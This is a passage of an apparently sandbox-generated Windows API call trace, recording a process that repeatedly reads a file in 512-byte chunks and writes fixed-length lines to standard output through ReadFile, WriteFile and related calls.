nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.120] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.121] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.121] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, 
lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.122] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.122] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.123] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.123] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.124] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.124] GetFileType (hFile=0x4c) returned 0x1 [0094.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.124] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.205] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.205] GetFileType (hFile=0x4c) returned 0x1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] GetFileType (hFile=0x4c) returned 0x1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.206] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.206] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, 
lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 
| out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.207] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.207] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.208] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.208] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 
[0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.209] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.209] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.210] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.210] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 